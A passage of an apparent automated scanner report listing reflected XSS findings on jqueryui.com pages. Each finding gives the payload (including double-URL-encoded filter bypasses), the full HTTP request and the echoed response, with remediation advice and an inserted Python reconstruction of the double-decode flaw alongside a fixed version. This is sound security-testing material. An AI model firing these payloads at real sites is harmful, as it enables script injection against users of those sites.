X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7896

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - RemoveClassa472b</title><script>alert(1)</script>4022b6ec612 Demos &amp; Documentation</title>
   
   <meta name="keywords" cont
...[SNIP]...

1.33. http://jqueryui.com/demos/resizable [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/resizable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 15aa5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0374a379391 was submitted in the REST URL parameter 2. This input was echoed as 15aa5</title><script>alert(1)</script>0374a379391 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/resizable15aa5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0374a379391 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7894

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Resizable15aa5</title><script>alert(1)</script>0374a379391 Demos &amp; Documentation</title>
   
   <meta name="keywords" conten
...[SNIP]...

1.34. http://jqueryui.com/demos/selectable [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/selectable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e5947%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e4b0ed442f was submitted in the REST URL parameter 2. This input was echoed as e5947</title><script>alert(1)</script>7e4b0ed442f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/selectablee5947%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e4b0ed442f HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7895

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Selectablee5947</title><script>alert(1)</script>7e4b0ed442f Demos &amp; Documentation</title>
   
   <meta name="keywords" conte
...[SNIP]...

1.35. http://jqueryui.com/demos/show [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/show

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload cf3be%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac7eb17e92 was submitted in the REST URL parameter 2. This input was echoed as cf3be</title><script>alert(1)</script>ac7eb17e92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/showcf3be%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac7eb17e92 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7888

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Showcf3be</title><script>alert(1)</script>ac7eb17e92 Demos &amp; Documentation</title>
   
   <meta name="keywords" content="jqu
...[SNIP]...

1.36. http://jqueryui.com/demos/slider [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/slider

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 5c543%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2e60ca751a was submitted in the REST URL parameter 2. This input was echoed as 5c543</title><script>alert(1)</script>d2e60ca751a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/slider5c543%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2e60ca751a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Slider5c543</title><script>alert(1)</script>d2e60ca751a Demos &amp; Documentation</title>
   
   <meta name="keywords" content="
...[SNIP]...

1.37. http://jqueryui.com/demos/sortable [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/sortable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 48288%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac67e82f056 was submitted in the REST URL parameter 2. This input was echoed as 48288</title><script>alert(1)</script>ac67e82f056 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/sortable48288%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac67e82f056 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7893

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Sortable48288</title><script>alert(1)</script>ac67e82f056 Demos &amp; Documentation</title>
   
   <meta name="keywords" content
...[SNIP]...

1.38. http://jqueryui.com/demos/switchClass [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/switchClass

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload dce5d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e931194fbe14 was submitted in the REST URL parameter 2. This input was echoed as dce5d</title><script>alert(1)</script>931194fbe14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/switchClassdce5d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e931194fbe14 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7896

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - SwitchClassdce5d</title><script>alert(1)</script>931194fbe14 Demos &amp; Documentation</title>
   
   <meta name="keywords" cont
...[SNIP]...

1.39. http://jqueryui.com/demos/tabs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/tabs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 74bf4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66633b53404 was submitted in the REST URL parameter 2. This input was echoed as 74bf4</title><script>alert(1)</script>66633b53404 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/tabs74bf4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66633b53404 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7889

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Tabs74bf4</title><script>alert(1)</script>66633b53404 Demos &amp; Documentation</title>
   
   <meta name="keywords" content="jq
...[SNIP]...

1.40. http://jqueryui.com/demos/toggle [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/toggle

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload af4d2%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e33cc3da75a1 was submitted in the REST URL parameter 2. This input was echoed as af4d2</title><script>alert(1)</script>33cc3da75a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/toggleaf4d2%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e33cc3da75a1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Toggleaf4d2</title><script>alert(1)</script>33cc3da75a1 Demos &amp; Documentation</title>
   
   <meta name="keywords" content="
...[SNIP]...

1.41. http://jqueryui.com/demos/toggleClass [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /demos/toggleClass

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a170a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93e94afd858 was submitted in the REST URL parameter 2. This input was echoed as a170a</title><script>alert(1)</script>93e94afd858 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
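The double-decode bypass used against this and the preceding jqueryui.com /demos findings (1.34 through 1.41 and the resizable entry before them), reconstructed as an added Python example. This is not the site's code: the blocklist characters, the route handling and the title template are assumptions, and only the payload and the rendered title line are taken from the report. Two things are worth seeing in working code. First, why the payload has to start with </title>: the content of a title element is RCDATA, so a <script> tag placed inside it is ordinary text until the title is closed. Second, the two remediation points separately: dropping the second decode fixes the bug, but even with the second decode left in place, moving the check after canonicalisation stops this payload. Output encoding is added as the layer that does not depend on either.

```python
import html
import re
from urllib.parse import unquote

# Constructed from the report: the /demos/resizable segment with the scanner's
# double-URL-encoded </title><script>alert(1)</script> appended (the hex
# markers are the scanner's; any would do).
PAYLOAD = ("resizable15aa5%253c%252ftitle%253e%253cscript%253ealert%25281%2529"
           "%253c%252fscript%253e0374a379391")

# Hypothetical blocklist: the report does not enumerate the characters the
# filter rejects, so this set is an assumption.
BLOCKED = set("<>\"'")


def web_server_decode(raw_segment: str) -> str:
    """The web server percent-decodes the request path once before the
    application sees it, so %253c reaches the application as %3c."""
    return unquote(raw_segment)


def render_title(name: str) -> str:
    """Mirrors the page's <title> layout; `name` must already be safe HTML."""
    return (f"<title>jQuery UI - {name[:1].upper() + name[1:]} "
            f"Demos &amp; Documentation</title>")


def vulnerable_title(raw_segment: str) -> str:
    """Reconstruction of the faulty order the report describes (not the site's
    real code): validate the once-decoded value, THEN decode it a second time,
    then write it into <title> with no HTML encoding."""
    value = web_server_decode(raw_segment)
    if any(ch in BLOCKED for ch in value):
        return render_title("Blocked")      # the filter only ever sees %3c, so this never fires
    value = unquote(value)                  # the needless second decode: %3c -> <
    return render_title(value)


def validate_after_canonicalisation(raw_segment: str) -> str:
    """Second remediation point on its own: keep the (wrong) double decode but
    run the check on the fully canonical value. Order alone stops the bypass."""
    value = unquote(web_server_decode(raw_segment))
    if any(ch in BLOCKED for ch in value):
        return render_title("Blocked")
    return render_title(value)


def hardened_title(raw_segment: str) -> str:
    """Both points plus output encoding: decode once (the server already did),
    allowlist the canonical value, and HTML-encode at the point of output so
    the title stays safe even if the allowlist is loosened later."""
    value = web_server_decode(raw_segment)
    if not re.fullmatch(r"[A-Za-z0-9_]{1,64}", value):
        value = "Unknown"                   # or answer 404; never echo the junk
    return render_title(html.escape(value, quote=True))


def script_injected(rendered_html: str) -> bool:
    """Oracle for the test: did a <script> start tag end up in the output?"""
    return "<script" in rendered_html.lower()
```

Run the three renderers against PAYLOAD: vulnerable_title reproduces the title line from the 1.33 response byte for byte, the other two render a harmless title. The allowlist alone is enough for a demo name; html.escape is kept so that any path which must echo a free-form value is still safe in the title context.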

Request

GET /demos/toggleClassa170a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93e94afd858 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7896

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ToggleClassa170a</title><script>alert(1)</script>93e94afd858 Demos &amp; Documentation</title>
   
   <meta name="keywords" cont
...[SNIP]...

1.42. http://jqueryui.com/docs/Changelog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Changelog

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b95db</title><script>alert(1)</script>2018b300e22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Changelogb95db</title><script>alert(1)</script>2018b300e22 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27144

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Changelogb95db</title><script>alert(1)</script>2018b300e22</title>
   
   <meta name="keywords" content="jquer
...[SNIP]...

1.43. http://jqueryui.com/docs/Changelog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Changelog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6be57</script><script>alert(1)</script>60168f40aba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Changelog6be57</script><script>alert(1)</script>60168f40aba HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27147

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Changelog6be57</script><script>alert(1)</script>60168f40aba</title>
   
   <meta name="keywords" content="jque
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Changelog6be57</script><script>alert(1)</script>60168f40aba]").addClass("selected");
</script>
...[SNIP]...

1.44. http://jqueryui.com/docs/Developer_Guide [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Developer_Guide

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 58f62</title><script>alert(1)</script>bebe32d69ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Developer_Guide58f62</title><script>alert(1)</script>bebe32d69ac HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27162

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Developer_Guide58f62</title><script>alert(1)</script>bebe32d69ac</title>
   
   <meta name="keywords" content=
...[SNIP]...

1.45. http://jqueryui.com/docs/Developer_Guide [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Developer_Guide

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fc30</script><script>alert(1)</script>a118870322d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Developer_Guide3fc30</script><script>alert(1)</script>a118870322d HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27165

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Developer_Guide3fc30</script><script>alert(1)</script>a118870322d</title>
   
   <meta name="keywords" content
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Developer_Guide3fc30</script><script>alert(1)</script>a118870322d]").addClass("selected");
</script>
...[SNIP]...

1.46. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Effects/Methods

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1c2e3</title><script>alert(1)</script>2d0e0645d25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Effects1c2e3</title><script>alert(1)</script>2d0e0645d25/Methods HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27162

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Effects1c2e3</title><script>alert(1)</script>2d0e0645d25/Methods</title>
   
   <meta name="keywords" content=
...[SNIP]...

1.47. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Effects/Methods

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 763bb</script><script>alert(1)</script>c92f51aa55a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /docs/Effects763bb</script><script>alert(1)</script>c92f51aa55a/Methods HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27165

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Effects763bb</script><script>alert(1)</script>c92f51aa55a/Methods</title>
   
   <meta name="keywords" content
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Effects763bb</script><script>alert(1)</script>c92f51aa55a/Methods]").addClass("selected");
</script>
...[SNIP]...

1.48. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Effects/Methods

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload df68a</title><script>alert(1)</script>cbd839e45c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Effects/Methodsdf68a</title><script>alert(1)</script>cbd839e45c8 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27162

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Effects/Methodsdf68a</title><script>alert(1)</script>cbd839e45c8</title>
   
   <meta name="keywords" content=
...[SNIP]...

1.49. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Effects/Methods

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 727f2</script><script>alert(1)</script>fb56f9f5163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

